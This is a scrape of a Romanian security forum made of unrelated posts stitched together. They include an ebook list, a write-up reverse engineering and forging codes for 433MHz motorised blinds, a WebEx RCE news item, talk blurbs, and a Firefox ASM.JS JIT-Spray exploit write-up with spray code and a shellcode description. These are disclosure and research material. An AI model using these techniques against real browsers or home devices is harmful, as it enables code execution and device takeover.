PDF MOBI MOBI EPUB EPUB Windows Server Introducing Windows Server 2012 R2 PDF MOBI EPUB Windows Server Introducing Windows Server 2016 PDF Windows Server Introducing Windows Server 2016 – Mobile PDF Windows Server Introducing Windows Server 2016 Technical Preview PDF Windows Server Introducing Windows Server 2016 Technical Preview – Mobile PDF Windows Server Introducing Windows Server® 2012 R2 Preview Release PDF MOBI EPUB Windows Server Offline Assessment for Active Directory PDF Windows Server RAP as a Service for Active Directory PDF Windows Server RAP as a Service for Failover Cluster PDF Windows Server RAP as a Service for Internet Information Services PDF Windows Server RAP as a Service for Windows Server Hyper-V PDF Windows Server Sursa: Windows Server 2016 Licensing https://blogs.msdn.microsoft.com/mssmallbiz/2017/07/11/largest-free-microsoft-ebook-giveaway-im-giving-away-millions-of-free-microsoft-ebooks-again-including-windows-10-office-365-office-2016-power-bi-azure-windows-8-1-office-2013-sharepo/ PDF

Reverse Engineering a 433MHz Motorised Blind RF Protocol I’ve been doing a fair bit of DIY home automation hacking lately across many different devices - mostly interested in adding DIY homekit integrations. A couple of months ago, my dad purchased a bulk order of RAEX 433MHz RF motorised blinds to install around the house, replacing our existing manual roller blinds. Note: These blinds are the same model sold at Spotlight under the name Motion Motorised Roller Blind The blinds are a fantastic addition to the house, and allow me to be super lazy opening/closing my windows, however in order to control them you need to purchase the RAEX brand remotes. RAEX manufacture many different types of remotes, of which, I have access to two of the types, depicted below: R Type Remote (YRL2016) X Type Remote (YR3144) Having a remote in every room of the house isn’t feasible, since many channels would be unused on these remotes and thus a waste of $$$ purchasing all the remotes. Instead, multiple rooms are programmed onto the same remote. Unfortunately due to this, remotes are highly contended for. An alternate solution to using the RAEX remotes is to use a piece of hardware called the RM Pro. This allows you to control the remotes via your smartphone using their app The app is slow, buggy and for me, doesn’t fit well into the home-automation ecosystem. I want my roller blinds to be accessible via Apple Homekit. In order to control these blinds, I knew I’d need to either: Reverse engineer how the RM Pro App communicated with the RM Pro and piggy-back onto this Reverse engineer the RF protocol the remotes used to communicate with the blinds. I attempted option 1 for a little while, but ruled it out as I was unable to intercept the traffic used to communicate between the iPhone and the hub. Therefore, I began my adventure to reverse engineer the RF protocol. I purchased a 433MHz transmitter/receiver pair for Arduino on Ebay. In case that link stops working, try searching Ebay for 433Mhz RF transmitter receiver link kit for Arduino. Initial Research A handful of Google searches didn’t yield many results for finding a technical specification of the protocol RAEX were using. I could not find any technical specification of the protocol via FCC or patent lookup Emailed RM Pro to obtain technical specification; they did not understand my English. Emailed RAEX to obtain technical specification; they would not release without confidentiality agreement. I did find that RFXTRX was able to control the blind via their BlindsT4 mode, which appears to also work for Outlook Motion Blinds. After opening one of the remotes and identifying the micro-controllers in use, I was unable to find any documentation explaining a generic RF encoding scheme being used. It may have been possible to reverse engineer the firmware on a remote by taking an I2C dump of the ROM chip. It seems similar remotes allow dumping at any point after boot Capturing the data Once my package had arrived I hooked up the receiver to an Arduino and began searching for an Arduino sketch that could capture the data being transmitted. I tried many things that all failed, however eventually found one that appeared to capture the data. Once I captured what I deemed to be enough data, I began analysing it. It was really difficult to make any sense of this data, and I didn’t even know if what had been captured was correct. I did some further reading and read a few RF reverse engineering write-ups. A lot of them experimented with the idea of using Audacity to capture the signal via the receiver plugged into the microphone port of the computer. I thought, why not, and began working on this. This captures a lot of data. I captured 4 different R type remotes, along with 2 different X type remotes, and to make things even more fun, 8 different devices pairings from the Broadlink RM Pro (B type). From this, I was able to determine a few things The transmissions did not have a rolling code. Therefore, I could simply replay captured signals and make the blind do the exact same thing each time. This would be the worst-case scenario if I could not reverse engineer the protocol. The transmissions were repeated at least 3 times (changed depending on the remote type being used) Zooming into the waveform, we can see the different parts of a captured transmission. This example below is the capture of Remote 1, Channel 1, for the pairing action: Zooming in: In the zoomed image you can see that the transmission begins with a oscillating 0101 AGC pattern, followed by a further double width preamble pattern, followed by a longer header pattern, and then by data. This preamble, header and data is repeated 3 times for R type remotes (The AGC pattern is only sent once at the beginning of transmission). This can be seen in the first image. Looking at this data won’t be too useful. I need a way to turn it digital and analyse the bits and determine some patterns between different remotes, channels and actions. Decoding the waveform. We need to determine how the waveform is encoded. It’s very common for these kinds of hardware applications to use one of the following: Manchester Encoding, Tri-State/Tri-bit Encoding, Additional info PWM Encoding Raw? high long = 11, high short = 1, low long = 00, low short = 0? By doing some research, I was able to determine that the encoding used was most likely manchester encoding. Let’s keep this in mind for later. Digitising the data I began processing the data as the raw scheme outlined above (even though I believed it was manchester). The reason for this is that if it happened to not be manchester, I could try decode it again with another scheme. (Also writing out raw by hand was easier than doing manchester decoding in my head). I wrote out each capture into a Google Sheets spreadsheet. It took about 5 minutes to write out each action for each channel, and there were 6 channels per remote. I began to think this would take a while to actually get enough data to analyse. (Considering I had 160 captures to digitise) I stopped once I collected all actions from 8 different channels across 2 remotes. This gave me 32 captures to play with. From this much data, I was able to infer a few things about the raw bits: Some bits changed per channel Some bits changed per remote. Some bits changed seemingly randomly for each channel/remote/action combination. Could this be some sort of checksum? I still needed more data, but I had way too many captures to decode by hand. In order to get anywhere with this, I needed a script to process WAV files I captured via Audacity. I wrote a script that detected headers and extracted data as its raw encoding equivalent (as I had been doing by hand). This script produced output in JSON so I could add additional metadata and cross-check the captures with the waveform: [ { "filename": "/Users/nickw/Dropbox/RF_Blinds/Export_Audio2/tracks2/R1_CH1.wav", "captures": [ { "data": "01100101100110011001100101101001011010010110011010011010101010101010101010011001101010101010101010101010101", "header_pos": 15751, "preamble_pos": 15071 }, { "data": "01100101100110011001100101101001011010010110011010100110101010101001101010011001101010101010101010101010101", "header_pos": 46307, "preamble_pos": 45628 }, { "data": "01100101100110011001100101101001011010010110011010010110101010101010011010011001101010101010101010101010101", "header_pos": 73514, "preamble_pos": 72836 }, { "data": "01100101100110011001100101101001011010010110011010101010101010100101010101101001011010101010101010101010101", "header_pos": 103575, "preamble_pos": 102895 } ] } ] Once verified, I tabulated this data and inserted it into my spreadsheet for further processing. Unfortunately there was too many bits per capture to keep myself sane: I decided it would be best if I decoded this as manchester. To do this, I wrote a script that processes the raw capture data into manchester (or other encoding types). Migrating this data into my spreadsheet, it begins to make a lot more sense. Looking at this data we can immediately see some relationship between the bits and their purpose: 6 bits for channel (C) 2 bits for action (A) 6 bits for some checksum, appears to be a function of action and channel. F(A, C) Changes when action changes Changes when channel changes. Cannot be certain it changes across remotes, since no channels are equal. 1 bit appears to be a function of Action F(A) 1 bit appears to be a function of F(A), thus, G(F(A)). It changes depending on F(A)’s value, sometimes 1-1 mapping, sometimes inverse mapping. After some further investigation, I determined that for the same remote and channel, for each different action, the F(A, C) increased by 1. (if you consider the bits to be big-endian.). Looking a bit more into this, I also determined that for adjacent channels, the bits associated with C(Channel) count upwards/backwards (X type remotes count upwards, R type remotes count backward). Additionally F(C) also increases/decreases together. Pay attention to the C column. From this, I can confirm a relationship between F(A, C) and C, such that F(A, C) = F(PAIR, C0) == F(PAIR, C1) ± 1. After this discovery, I also determine that there’s another mathematical relationship between F(A, C) and A (Action). Making More Data From the information we’ve now gathered, it seems plausible that we can create new remotes by changing 6 bits of channel data, and mutating the checksum accordingly, following the mathematical relationship we found above. This means we can generate 64 channels from a single seed channel. This many channels is enough to control all the blinds in the house, however I really wanted to fully decode the checksum field and in turn, be able to generate an (almost) infinite amount of remotes. I wrote a tool to output all channels for a seed capture: ./remote-gen generate 01000110110100100001010110111111111010101 ... My reasoning behind generating more data was that maybe we could determine how the checksum is formed if we can view different remotes on the same channel. I.e. R0CH0, R1CH0, X1CH0, etc… Essentially what I wanted to do was solve the following equation’s function G: F(ACTION_PAIR, CH0) == G(F(ACTION_PAIR, CH0)) However, looking at all Channel 0’s PAIR captures, the checksum still appeared to be totally jumbled/random: Whilst looking at this data, however, another pattern stands out. G(F(A)) sits an entire byte offset (8 bits) away from F(A). Additionally the first 2 bits of F(A, C) sit at the byte boundary and also align with A (Action). As Action increases, so does F(A, C). Lets line up all the bits at their byte boundaries and see what prevails: Colours denoting byte boundaries Aligned boundaries From here, we need to determine some function that produces the known checksum based on the first 4 bytes. Initially I try to do XOR across the bytes: Not so successful. The output appears random and XOR’ing the output with the checksum does not produce a constant key. Therefore, I deduce the checksum isn’t produced via XOR. How about mathematical addition? We’ve already seen some addition/subtraction relationship above. This appeared to be more promising - there was a constant difference between channels for identical type remotes. Could this constant be different across different type remotes because my generation program had a bug? Were we not wrapping the correct number of bits or using the wrong byte boundaries when mutating the channel or checksum? It turns out that this was the reason 😑. Solving the Checksum Looking at the original captures, and performing the same modulo additions, we determine the checksum is computed by adding the leading 4 bytes and adding 3. I can’t determine why a 3 is used here, other than RAEX wanting to make decoding their checksum more difficult or to ensure a correct transmission pattern. I refactored my application to handle the boundaries we had just identified: type RemoteCode struct { LeadingBit uint // Single bit Channel uint8 Remote uint16 Action uint8 Checksum uint8 } Looking at the data like this began to make more sense. It turns out that F(A) wasn’t a function of A(Action), it was actually part of the action data being transmitted: type BlindAction struct { Name string Value uint8 } var validActions = []BlindAction{ BlindAction{Value: 127, Name: "PAIR"}, BlindAction{Value: 252, Name: "DOWN"}, BlindAction{Value: 253, Name: "STOP"}, BlindAction{Value: 254, Name: "UP"}, Additionally, the fact there is a split between channel and remote probably isn’t necessary. Instead this could just be an arbitrary 24 bit integer, however it is easier to work with splitting it up as an 8 bit int and a 16 bit int. Based on this, I can deduce that the protocol has room for 2^24 remotes (~16.7 million)! That’s a lot of blinds! I formally write out the checksum function: func (r *RemoteCode) GuessChecksum() uint8 { return r.Channel + r.Remote.GetHigh() + r.Remote.GetLow() + r.Action.Value + 3 } Additional Tooling My remote-gen program was good for the purpose of generating codes using a seed remote (although, incorrect due to wrapping issues), however it now needed some additional functionality. I needed a way to extract information from the captures and verify that all their checksums align with our rule-set for generating checksums. I wrote an info command: ./remote-gen info 00010001110001001101010111011111101010100 --validate Channel: 196 Remote: 54673 Action: STOP Checksum: 42 Guessed Checksum: 42 Running with --validate exits with an error if the guessed checksum != checksum. Running this across all of our captures proved that our checksum function was correct. Another piece of functionality the tool needed was the ability to generate arbitrary codes to create our own remotes: ./remote-gen create --channel=196 --remote=54654 --verbose 00010001101111110101010111111111010011001 Action: PAIR 00010001101111110101010110011111101101000 Action: DOWN 00010001101111110101010111011111111101000 Action: STOP 00010001101111110101010110111111100011000 Action: UP I now can generate any remote I deem necessary using this tool. Wrapping Up There you have it, that’s how I reverse engineered an unknown protocol. I plan to follow up this post with some additional home-automation oriented blog posts in the future. From here I’m going to need to build my transmitter to transmit my new, generated codes and build an interface into homekit for this via my homebridge program. You can view all the work related to this project in the nickw444/homekit/blindkit repo. Sursa

Web Development Limbaje WEB: PHP, Javascript Design: Bootstrap Template engine: Smarty Editare/Fixare/Optimizare: Wordpress Framework pentru scrapere: Simple HTML Dom Informatii -Accept proiecte de lunga durata cat si cele de scurta durata. -La orice proiect or sa se stabileasca toate detaliile la inceput cu clientul, nu se pot aduce new features pe durata proiectului.(Decat mici modificari) -Support-ul este FREE in totalitate. Prin support ma refer: instalare, fixare buguri, fixare MySQL, etc. -Preturile or sa fie stabilite in functie de timpul necesar proiectului si complexitatea sa. -Accept si job-uri unde primesc salariu lunar. -Accept si job-uri in care sunt platit pe ora. Portofoliu: -Ofer live preview la proiecte in privat sau prin TeamViewer(Nu am voie sa las link-ul companiilor dar pot arata poze.) Plata -BitCoin/Etherum -PayPal -Transfer Bancar -Paysafe Contact -ICQ: MOMENTANT NEDISPONIBIL -Telegram: @adicode -Skype: adicode32@outlook.com -Jabber: adicode@404.city **Nu lasa-ti mesaje gen "ti-am dat add", "cat m-ar costa?", "poti face asta?" in topic, va rog frumos. Astept orice intrebare in PM sau pe una din retelele de mai sus. Multumesc.

Ma numesc Angelica,.si am intrat aici ca sa mai imi imbogatesc cunostintele ,.dar in primul rand am intrat pentru a afla si gasi o modalitate de rezolvare a unei probleme,.si anume: Sunt operatoare pe un anume chat.,si intampin probleme cu un individ care ma jigneste ca la usa cortului...Tipul are IP dinamic..si intra de pe AndroIrc. L-am banat dar intra iarasi. Va rog sa ma ajutati cu ceva idei.,si anume cum as putea sa ii fixez Ip-ul, deci sa il banez astfel incat sa nu mai revina. Ma ameninta mereu ca va reveni,.si asa si este revine cu injuraturile. Va multumesc frumos. Am speranta ca se va gasi o solutie.

https://github.com/xoreaxeaxeax/movfuscator Imi cer scuze, nu dau paste de pe github, ajunge link-ul in umila mea opinie. Sursa unde l-am descoperit: https://twitter.com/emilyst/status/886707159454461952

A highly critical vulnerability has been discovered in the Cisco Systems’ WebEx browser extension for Chrome and Firefox, for the second time in this year, which could allow attackers to remotely execute malicious code on a victim's computer. Cisco WebEx is a popular communication tool for online events, including meetings, webinars and video conferences that help users connect and collaborate with colleagues around the world. The extension has roughly 20 million active users. Discovered by Tavis Ormandy of Google Project Zero and Cris Neckar of Divergent Security, the remote code execution flaw (CVE-2017-6753) is due to a designing defect in the WebEx browser extension. To exploit the vulnerability, all an attacker need to do is trick victims into visiting a web page containing specially crafted malicious code through the browser with affected extension installed. Successful exploitation of this vulnerability could result in the attacker executing arbitrary code with the privileges of the affected browser and gaining control of the affected system. Cisco has already patched the vulnerability and released “Cisco WebEx Extension 1.0.12” update for Chrome and Firefox browsers that address this issue, though "there are no workarounds that address this vulnerability." Download Cisco WebEx Extension 1.0.12 Chrome Extensions Firefox Extension In general, users are always recommended to run all software as a non-privileged user in an effort to diminish the effects of a successful attack. Fortunately, Apple's Safari, Microsoft's Internet Explorer and Microsoft's Edge are not affected by this vulnerability. Cisco WebEx Productivity Tools, Cisco WebEx browser extensions for Mac or Linux, and Cisco WebEx on Microsoft Edge or Internet Explorer are not affected by the vulnerability, the company confirmed. The remote code execution vulnerability in Cisco WebEx extension has been discovered second time in this year. Ormandy alerted the networking giant to an RCE flaw in the WebEx browser extension earlier this year as well, which even led to Google and Mozilla temporarily removing the add-on from their stores. Via thehackernews.com

E genial tipul care a facut asta. Hacker in adevaratul sens al cuvantului.

Dafuq!? Despre ce vorbesti?

Publicat pe 17 iul. 2017 Java Serialization is commonly used by large-scale enterprise applications and presents significant opportunities for attacks that often lead to unauthenticated remote command execution against the underlying application servers. While serialization exploits are not new, identifying and exploiting serialization vulnerabilities can be more involved than other common vulnerabilities. During this talk I’ll look at some real attacks against Java serialization and demonstrate how to identify and attack serialization vulnerabilities to reap the rewards of RCE.

Publicat pe 17 iul. 2017 This talk illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.

Baneaza clasa ip pe care o are , dar e cam aiurea ca banezi toti utilizatorii acelei clase ... EX. : 123.456.78.90 Toata clasa : 123.0.0.0 adica tot ce tine de "123" : 123.456.0.0 adica tot ce tine de "123.456"

The Return of the JIT (Part 1) TL;DR: This is the story about ASM.JS JIT-Spray in Mozilla Firefox (x86) on Windows tracked as CVE-2017-5375 and CVE-2017-5400. It allows to fully bypass DEP and ASLR. I always liked the idea of JIT-Spray since the first time I saw it being used for Flash in 2010. Just to name a few, JIT-Spray has been used to exploit bugs in Apple Safari, create info leak gadgets in Flash, attack various other client software, and has even been abusing Microsoft’s WARP Shader JIT Engine @asintsov wrote in 2010: Yes, the idea will never die, and from time to time JIT-Spray reappears… JIT-Spray It greatly simplifies exploiting a memory corruption bug such as an use-after-free, because the attacker only needs to hijack the intruction pointer and jump to JIT-Sprayed shellcode. There is no need to disclose code locations or base addresses of DLLs, and there is no need for any code-reuse. JIT-Spray is usually possible when: Machine code can be hidden within constants of a high-level language such as JavaScript: This bypasses DEP. The attacker is able to force the JIT compiler to emit the constants into many execuable code regions whose addresses are predictable: This bypasses ASLR. For example to achieve (1), we can inject NOPS (0x90) in ASM.JS code with: Injecting NOPS with ASM.JS constants 1 2 VAL = (VAL + 0xA8909090)|0; VAL = (VAL + 0xA8909090)|0; Firefox’ ASM.JS compiler generates the following x86 machine code: Native x86 code generated from ASM.JS 1 2 00: 05909090A8 ADD EAX, 0xA8909090 05: 05909090A8 ADD EAX, 0xA8909090 When we jump into to offset 01 (the middle of the first instruction) we can execute our hidden code: Hidden instructions within emitted x86 code 1 2 3 4 5 6 7 8 01: 90 NOP 02: 90 NOP 03: 90 NOP 04: A805 TEST AL, 05 06: 90 NOP 07: 90 NOP 08: 90 NOP 09: A8... Thus, in our four-byte constants, we have three bytes to hide our code and one byte (0xA8) to wrap the ADD EAX, …instruction into the NOP-like instruction TEST AL, 05. To achieve condition (2), i.e., to create many executable regions containing our code we request the ASM.JS module many times: ASM.JS JIT-Sprayer 1 2 3 4 5 6 7 8 9 10 11 12 function asm_js_module(){ "use asm" function asm_js_function(){ /* attacker controlled asm.js code */ } return asm_js_function } modules = [] /* create 0x1000 executable regions containing our code */ for (i=0; i<=0x1000; i++){ modules[i] = asm_js_module() // request asm.js module } Technically, ASM.JS is an ahead-of-time (AOT) compiler and not a just-in-time (JIT) compiler. Hence, the function asm_js_function() doesn’t need to be called to get your machine code injected into memory at predictable addresses. It is sufficient to load a web page containing the ASM.JS script. The Flaw Each time an ASM.JS module is requested, CodeSegment::create() is called which in turn calls AllocateCodeSegment()in firefox-50.1.0/js/src/asmjs/WasmCode.cpp line #206 (based on the source of Firefox 50.1.0): firefox-50.1.0/js/src/asmjs/WasmCode.cpp (CodeSegment::create) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 191 /* static */ UniqueCodeSegment 192 CodeSegment::create(JSContext* cx, 193 const Bytes& bytecode, 194 const LinkData& linkData, 195 const Metadata& metadata, 196 HandleWasmMemoryObject memory) 197 { 198 MOZ_ASSERT(bytecode.length() % gc::SystemPageSize() == 0); 199 MOZ_ASSERT(linkData.globalDataLength % gc::SystemPageSize() == 0); 200 MOZ_ASSERT(linkData.functionCodeLength < bytecode.length()); 201 202 auto cs = cx->make_unique<CodeSegment>(); 203 if (!cs) 204 return nullptr; 205 206 cs->bytes_ = AllocateCodeSegment(cx, bytecode.length() + linkData.globalDataLength); AllocateCodeSegment() further calls AllocateExecutableMemory() in line #67: firefox-50.1.0/js/src/asmjs/WasmCode.cpp (AllocateCodeSegment) 1 2 3 4 5 6 7 8 9 10 11 58 AllocateCodeSegment(ExclusiveContext* cx, uint32_t totalLength) 59 { 60 if (wasmCodeAllocations >= MaxWasmCodeAllocations) 61 return nullptr; 62 63 // Allocate RW memory. DynamicallyLinkModule will reprotect the code as RX. 64 unsigned permissions = 65 ExecutableAllocator::initialProtectionFlags(ExecutableAllocator::Writable); 66 67 void* p = AllocateExecutableMemory(nullptr, totalLength, permissions, 68 "wasm-code-segment", gc::SystemPageSize()); Finally, AllocateExecutableMemory() invokes VirtualAlloc() which returns a new RW (PAGE_READWRITE) region aligned to a 64KB boundary (0xXXXX0000) (firefox-50.1.0/js/src/jit/ExecutableAllocatorWin.cpp, line #190). firefox-50.1.0/js/src/jit/ExecutableAllocatorWin.cpp (AllocateExecutableMemory) 1 2 3 4 5 6 7 8 9 10 11 12 179 void* 180 js::jit::AllocateExecutableMemory(void* addr, size_t bytes, unsigned permissions, const char* tag, 181 size_t pageSize) 182 { 183 MOZ_ASSERT(bytes % pageSize == 0); 184 185 #ifdef JS_CPU_X64 186 if (sJitExceptionHandler) 187 bytes += pageSize; 188 #endif 189 190 void* p = VirtualAlloc(addr, bytes, MEM_COMMIT | MEM_RESERVE, permissions); If we set a breakpoint on VirtualAlloc() in WinDbg, we get the following call stack during runtime (Firefox 50.1.0): Stack trace in WinDbg 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 0:000> kP a # ChildEBP RetAddr 00 008fe060 670ef66e KERNEL32!VirtualAllocStub 01 (Inline) -------- xul!js::jit::AllocateExecutableMemory+0x10 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\executableallocatorwin.cpp @ 190] 02 008fe078 670f65c7 xul!AllocateCodeSegment( class js::ExclusiveContext * cx = 0x04516000, unsigned int totalLength = <Value unavailable error>)+0x23 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 67] 03 008fe0b8 670de070 xul!js::wasm::CodeSegment::create( struct JSContext * cx = 0x04516000, class mozilla::Vector<unsigned char,0,js::SystemAllocPolicy> * bytecode = 0x08c61008, struct js::wasm::LinkData * linkData = 0x08c61020, struct js::wasm::Metadata * metadata = 0x06ab68d0, class JS::Handle<js::WasmMemoryObject *> memory = class JS::Handle<js::WasmMemoryObject *>)+0x67 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 206] 04 008fe184 6705f99d xul!js::wasm::Module::instantiate( struct JSContext * cx = 0x04516000, class JS::Handle<JS::GCVector<JSFunction *,0,js::TempAllocPolicy> > funcImports = class JS::Handle<JS::GCVector<JSFunction *,0,js::TempAllocPolicy> >, class JS::Handle<js::WasmTableObject *> tableImport = class JS::Handle<js::WasmTableObject *>, class JS::Handle<js::WasmMemoryObject *> memoryImport = class JS::Handle<js::WasmMemoryObject *>, class mozilla::Vector<js::wasm::Val,0,js::SystemAllocPolicy> * globalImports = 0x008fe200, class JS::Handle<JSObject *> instanceProto = class JS::Handle<JSObject *>, class JS::MutableHandle<js::WasmInstanceObject *> instanceObj = class JS::MutableHandle<js::WasmInstanceObject *>)+0x94 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmmodule.cpp @ 689] 05 008fe260 6705aae6 xul!TryInstantiate( struct JSContext * cx = 0x04516000, class JS::CallArgs args = class JS::CallArgs, class js::wasm::Module * module = 0x08c61000, struct js::AsmJSMetadata * metadata = 0x06ab68d0, class JS::MutableHandle<js::WasmInstanceObject *> instanceObj = class JS::MutableHandle<js::WasmInstanceObject *>, class JS::MutableHandle<JSObject *> exportObj = class JS::MutableHandle<JSObject *>)+0x1e6 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 7894] 06 008fe2c4 35713638 xul!InstantiateAsmJS( struct JSContext * cx = 0x04516000, unsigned int argc = 0, class JS::Value * vp = 0x008fe2f0)+0x88 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 8008] After returning into method CodeSegment::create(), the ASM.JS compiled/native code is copied to the RW region (firefox-50.1.0/js/src/asmjs/WasmCode.cpp, line #223). And in line #229 the RW region is made executable (PAGE_EXECUTE_READ) with ExecutableAllocator::makeExecutable() invoking VirtualProtect(). firefox-50.1.0/js/src/asmjs/WasmCode.cpp making ASM.JS code executable (in CodeSegment::create) 1 2 3 4 5 6 7 223 memcpy(cs->code(), bytecode.begin(), bytecode.length()); 224 StaticallyLink(*cs, linkData, cx); 225 if (memory) 226 SpecializeToMemory(*cs, metadata, memory); 227 } 228 229 if (!ExecutableAllocator::makeExecutable(cs->code(), cs->codeLength())) { Requesting one ASM.JS module many times leads to the creation of many RX regions. Due to the allocation granularity of VirtualAlloc (64KB) we can then choose a fixed address (such as 0x1c1c0000) and can be certain that the emitted machine code is located there (containing our hidden payload). The astute reader might have noticed that constant blinding is missing and allows to emit ASM.JS constants as x86 code in the first place. Show me a PoC! Let’s see how a proof of concept looks in practice: we hide our payload within ASM.JS constants and request the ASM.JS module many times. Hence, we spray many executable code regions to occupy predictable addresses. The payload consists of two parts: Very large NOP-sled (line #35 to #74): to hit it, we can choose a predictable address, such as 0x1c1c0053, and set EIP to it. Shellcode (line #75 to #152): it resolves kernel32!WinExec()and executes cmd.exe. The payload strictly contains at most three-byte long instructions excepts MOVs, which are handled differently. It was automatically generated by a custom transformation tool shellcode2asmjs which uses the Nasm assembler and Distorm3disassembler. The payload is strongly inspired by Writing JIT-Spray-Shellcode. As no memory corruption is abused in this PoC, you have to set EIP in your favorite debugger when you are prompted to Exploiting a former Tor-Browser 0day with ASM.JS JIT-Spray Let’s take a real memory corruption (CVE-2016-9079) and see how super easy exploitation becomes when using ASM.JS JIT-Spray. This use-after-free has been analyzed thoroughly, so most of the hard work to write a custom exploit was already done. Note: We target Firefox 50.0.1 and not 50.1.0 as above. Despite JIT-Spraying executable regions, following steps are conducted: We use the bug-trigger from the bug report (line #296 to #372). We heap-spray a fake object (line #258 to #281). During runtime, the chosen values in our fake object drive the execution to a program path with an indirect call. There, EIP is set with the address of one JIT-Sprayed region (0x1c1c0054). As soon as the bug is triggered, the JIT-sprayed payload is executed and cmd.exe should pop up. That’s all. The full exploit targets Mozilla Firefox 50.0.1, and we don’t need any information-leaks and code-reuse. Note that the Tor-Browser has ASM.JS disabled by default, and hence, ASM.JS JIT-Spray won’t work unless the user enables it. I wonder if Endgames HA-CFI catches this exploit? Dynamic Payloads Above exploits contain “hardcoded” payloads within constants. That makes it kind of cumbersome to use different shellcodes. However, we can generate ASM.JS scripts on the fly and invoke them during runtime. A PoC where payloads are exchangeable uses the following: JavaScript code creates ASM.JS script-code dynamically. The ASM.JS script is included with the Blob JavaScript API (line #88 to #137). A custom VirtualAlloc stage0. It allocates RWX pages and copies the actual stage1 payload (i.e. metasploit shellcode) to it. Afterwards, stage0 jumps to stage1 (line #53 to #69). This way, you can replace the payload with your favorite shellcode of choice (line #33). The PoC and especially the stage0 payload were also auto-generated with the custom shellcode2asmjs tool. The Incomplete Fix Mozilla fixed this issue in Firefox 51 on Jan. 24, 2017. However, the fix can be bypassed which resulted in CVE-2017-5400. This will be explained in part 2. Posted by Rh0 advisory, exploit Sursa: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/

Writing a Simple Operating System — from Scratch by Nick Blundell School of Computer Science, University of Birmingham, UK Draft: December 2, 2010 Copyright c 2009–2010 Nick Blundell Contents Contents ii 1 Introduction 1 2 Computer Architecture and the Boot Process 3 2.1 The Boot Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 2.2 BIOS, Boot Blocks, and the Magic Number . . . . . . . . . . . . . . . . 4 2.3 CPU Emulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2.3.1 Bochs: A x86 CPU Emulator . . . . . . . . . . . . . . . . . . . 6 2.3.2 QEmu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 2.4 The Usefulness of Hexadecimal Notation . . . . . . . . . . . . . . . . . . 6 3 Boot Sector Programming (in 16-bit Real Mode) 8 3.1 Boot Sector Re-visited . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 3.2 16-bit Real Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 3.3 Erm, Hello? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 3.3.1 Interrupts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 3.3.2 CPU Registers . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 3.3.3 Putting it all Together . . . . . . . . . . . . . . . . . . . . . . . 11 3.4 Hello, World! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 3.4.1 Memory, Addresses, and Labels . . . . . . . . . . . . . . . . . . 13 3.4.2 ’X’ Marks the Spot . . . . . . . . . . . . . . . . . . . . . . . . . 13 Question 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 3.4.3 Defining Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 3.4.4 Using the Stack . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Question 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 3.4.5 Control Structures . . . . . . . . . . . . . . . . . . . . . . . . . 17 Question 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 3.4.6 Calling Functions . . . . . . . . . . . . . . . . . . . . . . . . . . 19 3.4.7 Include Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 3.4.8 Putting it all Together . . . . . . . . . . . . . . . . . . . . . . . 21 Question 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 3.4.9 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 ii CONTENTS iii 3.5 Nurse, Fetch me my Steth-o-scope . . . . . . . . . . . . . . . . . . . . . 22 3.5.1 Question 5 (Advanced) . . . . . . . . . . . . . . . . . . . . . . . 23 3.6 Reading the Disk . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 3.6.1 Extended Memory Access Using Segments . . . . . . . . . . . . 23 3.6.2 How Disk Drives Work . . . . . . . . . . . . . . . . . . . . . . . 24 3.6.3 Using BIOS to Read the Disk . . . . . . . . . . . . . . . . . . . 27 3.6.4 Putting it all Together . . . . . . . . . . . . . . . . . . . . . . . 28 4 Entering 32-bit Protected Mode 30 4.1 Adapting to Life Without BIOS . . . . . . . . . . . . . . . . . . . . . . . 31 4.2 Understanding the Global Descriptor Table . . . . . . . . . . . . . . . . 32 4.3 Defining the GDT in Assembly . . . . . . . . . . . . . . . . . . . . . . . 35 4.4 Making the Switch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36 4.5 Putting it all Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 5 Writing, Building, and Loading Your Kernel 41 5.1 Understanding C Compilation . . . . . . . . . . . . . . . . . . . . . . . . 41 5.1.1 Generating Raw Machine Code . . . . . . . . . . . . . . . . . . 41 5.1.2 Local Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . 44 5.1.3 Calling Functions . . . . . . . . . . . . . . . . . . . . . . . . . . 46 5.1.4 Pointers, Addresses, and Data . . . . . . . . . . . . . . . . . . . 47 5.2 Executing our Kernel Code . . . . . . . . . . . . . . . . . . . . . . . . . 49 5.2.1 Writing our Kernel . . . . . . . . . . 